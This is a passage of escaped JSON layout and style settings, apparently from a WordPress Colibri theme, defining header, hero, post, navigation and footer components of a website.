255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"props\":{\"hoverEffect\":{\"type\":\"bordered-active-item bordered-active-item--bottom\",\"activeGroup\":\"border\",\"group\":{\"border\":{\"transition\":\"effect-borders-grow grow-from-center\"}},\"enabled\":true},\"sticky\":true,\"showOffscreenMenuOn\":\"has-offcanvas-tablet\"},\"v\":\"1.1\",\"nodes\":[\"10-h9\"],\"nodeId\":\"10-h9\"},{\"id\":43,\"type\":\"hop-mobile-menu\",\"nodeId\":\"11-h33\",\"v\":\"1.1\",\"nodes\":[\"7-h10\",\"10-h10\"]},{\"id\":44,\"type\":\"hop-offscreen-panel\",\"nodeId\":\"11-h34\",\"v\":\"1.1\",\"nodes\":[\"7-h11\",\"10-h11\"]},{\"id\":45,\"type\":\"hop-row\",\"nodeId\":\"11-h36\",\"v\":\"1.1\",\"nodes\":[\"7-h13\",\"10-h13\"]},{\"id\":46,\"type\":\"hop-column\",\"nodeId\":\"11-h37\",\"v\":\"1.1\",\"nodes\":[\"7-h14\",\"10-h14\"]},{\"id\":47,\"type\":\"hop-logo\",\"nodeId\":\"11-h38\",\"v\":\"1.1\",\"nodes\":[\"7-h15\",\"10-h15\"],\"props\":{\"layoutType\":\"text\"}},{\"id\":48,\"type\":\"hop-row\",\"nodeId\":\"11-h39\",\"v\":\"1.1\",\"nodes\":[\"7-h16\",\"10-h16\"]},{\"id\":49,\"type\":\"hop-column\",\"nodeId\":\"11-h40\",\"v\":\"1.1\",\"nodes\":[\"7-h17\",\"10-h17\"]},{\"id\":50,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"nodeId\":\"11-h35\",\"v\":\"1.1\",\"nodes\":[\"7-h12\",\"10-h12\"]},{\"id\":51,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"7-h19\",\"10-h19\"]},{\"id\":52,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\",\"value\":\"15\"}}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h20\",\"10-h20\"]},{\"id\":53,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"7-h21\",\"10-h21\"]},{\"id\":54,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\":{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"7-h22\",\"10-h22\"]},{\"id\":55,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h23\",\"10-h23\"]},{\"id\":56,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"7-h24\",\"10-h24\"]},{\"id\":57,\"style\":{\"typography\":{\"holders\":{\"h1\":{\"color\":\"${theme.colors.4}\"},\"h2\":{\"color\":\"${theme.colors.4}\"},\"h3\":{\"color\":\"${theme.colors.4}\"},\"h4\":{\"color\":\"${theme.colors.4}\"},\"h5\":{\"color\":\"${theme.colors.4}\"},\"h6\":{\"color\":\"${theme.colors.4}\"},\"p\":{\"color\":\"${theme.colors.4}\"}}},\"background\":{\"type\":\"none\",\"color\":\"${theme.colors.0}\",\"overlay\":{\"shape\":{\"value\":\"none\",\"isTile\":false,\"img\":\"data:image\\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAALEgAACxIB0t1+\\/AAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAAAANSURBVAiZY\\/j\\/\\/z8DAAj8Av6Fzas0AAAAAElFTkSuQmCC\"},\"light\":false,\"color\":{\"value\":\"#000000\",\"opacity\":0,\"opacity_\":0},\"enabled\":true,\"type\":\"color\",\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"rgba(183,33,255, 0)\"},{\"position\":\"100\",\"color\":\"rgba(33,212,253, 0)\"}]}},\"image\":[{\"source\":{\"url\":\"\",\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"#b721ff\"},{\"position\":\"100\",\"color\":\"#21d4fd\"}]}},\"attachment\":\"scroll\",\"position\":\"center center\",\"repeat\":\"no-repeat\",\"size\":\"cover\",\"useParallax\":false}],\"slideshow\":{\"duration\":{\"value\":1500},\"speed\":{\"value\":500},\"slides\":[{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/beach-landscape-sea-water-nature-sand-1061655-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/landscape-tree-water-nature-grass-outdoor-1327743-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/leaf-nature-water-green-freshness-dew-1440543-pxhere.com.jpg\"}]},\"video\":{\"videoType\":\"external\",\"externalUrl\":\"https:\\/\\/www.youtube.com\\/watch?v=coYirc_qoSA\",\"internalUrl\":false,\"poster\":{\"url\":\"https:\\/\\/static.colibriwp.com\\/assets\\/sources\\/colibri-demo-video-cover.jpg\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"50\"},\"bottom\":{\"unit\":\"px\",\"value\":\"50\"}},\"separatorBottom\":{\"type\":\"mountains\",\"color\":\"#FFF\",\"height\":{\"value\":100},\"enabled\":false,\"negative\":false}},\"props\":{\"heroSection\":{\"layout\":\"textWithMediaOnRight\",\"mediaType\":\"hop-image\"},\"attrs\":{\"name\":\"hero\",\"id\":\"hero\"},\"layoutType\":\"textWithMediaOnRight\"},\"type\":\"hop-hero\",\"nodeId\":\"10-h29\",\"nodes\":[\"10-h25\"],\"v\":\"1.1\"},{\"id\":58,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"10-h37\",\"nodes\":[\"10-h26\"],\"v\":\"1.1\"},{\"id\":59,\"type\":\"hop-column\",\"nodeId\":\"10-h38\",\"nodes\":[\"10-h27\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}}},{\"id\":60,\"type\":\"hop-page-title\",\"nodeId\":\"10-h39\",\"nodes\":[\"10-h28\"],\"v\":\"1.1\"},{\"id\":61,\"type\":\"hop-footer\",\"props\":{\"useFooterParallax\":true},\"v\":\"1.1\",\"nodes\":[\"13-f1\"]},{\"id\":62,\"type\":\"hop-section\",\"style\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"30\"},\"bottom\":{\"path\":\"value\",\"value\":\"30\"}}},\"v\":\"1.1\",\"nodes\":[\"13-f2\"]},{\"id\":63,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalInnerGap\":1,\"verticalGap\":1,\"horizontalGap\":1},\"media\":{\"mobile\":{\"layout\":{\"verticalGap\":2,\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"13-f3\"]},{\"id\":64,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":1,\"verticalInnerGap\":1},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"13-f4\"]},{\"id\":65,\"type\":\"hop-copyright\",\"nodeId\":\"13-f6\",\"v\":\"1.1\",\"nodes\":[\"13-f5\"]},{\"id\":66,\"type\":\"hop-main\",\"nodeId\":\"71-m1\",\"v\":\"1.1\",\"nodes\":[\"432-m1\"],\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"40\",\"y\":\"10\",\"spread\":\"0\",\"color\":\"rgba(1, 51, 74, 0.15)\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"props\":{\"attrs\":{\"overflowOption\":\"hidden\"}}},{\"id\":67,\"type\":\"hop-section\",\"nodeId\":\"16-m29\",\"nodes\":[\"432-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"v\":\"1.1\",\"props\":{\"width\":\"boxed\"}},{\"id\":68,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"16-m33\",\"nodes\":[\"432-m25\"],\"v\":\"1.1\"},{\"id\":69,\"type\":\"hop-column\",\"nodeId\":\"16-m34\",\"nodes\":[\"432-m26\"],\"v\":\"1.1\"},{\"id\":70,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"16-m35\",\"nodes\":[\"432-m27\"],\"v\":\"1.1\"},{\"id\":71,\"type\":\"hop-text\",\"nodeId\":\"16-m36\",\"nodes\":[\"432-m28\"],\"v\":\"1.1\"},{\"id\":72,\"type\":\"hop-post-loop\",\"nodeId\":\"23-m35\",\"style\":{\"background\":{\"color\":\"\"}},\"v\":\"1.1\",\"nodes\":[\"432-m3\"]},{\"id\":73,\"type\":\"hop-loop-item\",\"nodeId\":\"23-m36\",\"v\":\"1.1\",\"nodes\":[\"432-m4\"],\"style\":{\"background\":{\"color\":\"\"},\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":74,\"type\":\"hop-post-thumbnail\",\"nodeId\":\"23-m37\",\"style\":{\"background\":{\"color\":\"rgba(255,255,255,0)\"}},\"v\":\"1.1\",\"nodes\":[\"432-m5\"]},{\"id\":75,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"itemsPerRow\":1,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"type\":\"hop-row\",\"nodeId\":\"1723-m26\",\"v\":\"1.1\",\"nodes\":[\"432-m6\"]},{\"id\":76,\"type\":\"hop-column\",\"nodeId\":\"1723-m27\",\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}},\"v\":\"1.1\",\"nodes\":[\"432-m7\"],\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}},{\"id\":77,\"type\":\"hop-post-meta\",\"nodeId\":\"26-m15\",\"v\":\"1.1\",\"nodes\":[\"432-m8\"],\"style\":{\"descendants\":{\"metaDataLinks\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"weight\":\"400\",\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}},\"icons\":{\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"display\":\"none\",\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\"}}}},\"metaDataPrefix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}}}},{\"id\":78,\"type\":\"hop-post-content\",\"nodeId\":\"23-m40\",\"v\":\"1.1\",\"nodes\":[\"432-m9\"],\"style\":{\"descendants\":{\"content\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"holders\":{\"p\":{\"color\":\"${theme.colors.5|variant2}\"}}}}}}},{\"id\":79,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-categories-container\",\"nodeId\":\"16-m34\",\"nodes\":[\"432-m10\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":80,\"type\":\"hop-column\",\"nodeId\":\"16-m38\",\"nodes\":[\"432-m11\"],\"v\":\"1.1\",\"props\":{\"verticalAlign\":\"center\"}},{\"id\":81,\"type\":\"hop-text\",\"nodeId\":\"16-m39\",\"nodes\":[\"432-m12\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":82,\"type\":\"hop-column\",\"nodeId\":\"16-m36\",\"nodes\":[\"432-m13\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\"},\"props\":{\"verticalAlign\":\"center\"}},{\"id\":83,\"type\":\"hop-post-categories\",\"nodeId\":\"16-m37\",\"nodes\":[\"432-m14\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"categoriesLinks\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}},\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.4|variant2}\",\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}}}}},{\"id\":84,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":0,\"verticalGap\":0,\"equalHeight\":false}},\"type\":\"hop-post-tags-container\",\"nodeId\":\"16-m30\",\"nodes\":[\"432-m15\"],\"v\":\"1.1\"},{\"id\":85,\"type\":\"hop-column\",\"nodeId\":\"16-m40\",\"nodes\":[\"432-m16\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"verticalAlign\":\"center\"}},{\"id\":86,\"type\":\"hop-text\",\"nodeId\":\"16-m41\",\"nodes\":[\"432-m17\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"400\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"props\":{\"type\":\"normal\"}},{\"id\":87,\"type\":\"hop-column\",\"nodeId\":\"16-m32\",\"nodes\":[\"432-m18\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"vSpace\":{\"value\":23}},\"verticalAlign\":\"center\"}},{\"id\":88,\"type\":\"hop-post-tags\",\"nodeId\":\"16-m33\",\"nodes\":[\"432-m19\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"tagsLinks\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}},\"typography\":{\"color\":\"${theme.colors.4|variant2}\",\"decoration\":\"none\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"tagsPrefix\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}}}}},{\"id\":89,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"16-m39\",\"nodes\":[\"432-m20\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}}},{\"id\":90,\"type\":\"hop-column\",\"nodeId\":\"16-m40\",\"nodes\":[\"432-m21\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":91,\"type\":\"hop-post-nav-button\",\"nodeId\":\"23-m48\",\"v\":\"1.1\",\"nodes\":[\"432-m22\"],\"style\":{\"descendants\":{\"navigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"none\",\"color\":\"black\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"none\",\"color\":\"black\"},\"left\":{\"style\":\"none\",\"color\":\"black\"},\"right\":{\"style\":\"none\",\"color\":\"black\"}},\"background\":{\"color\":\"\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"navigationTitle\":{\"maxWidth\":{\"value\":\"40\",\"unit\":\"ch\"}}}}},{\"id\":92,\"type\":\"hop-column\",\"nodeId\":\"16-m41\",\"nodes\":[\"432-m23\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"right\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":93,\"type\":\"hop-post-nav-button\",\"nodeId\":\"23-m49\",\"v\":\"1.1\",\"nodes\":[\"432-m24\"],\"style\":{\"descendants\":{\"navigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\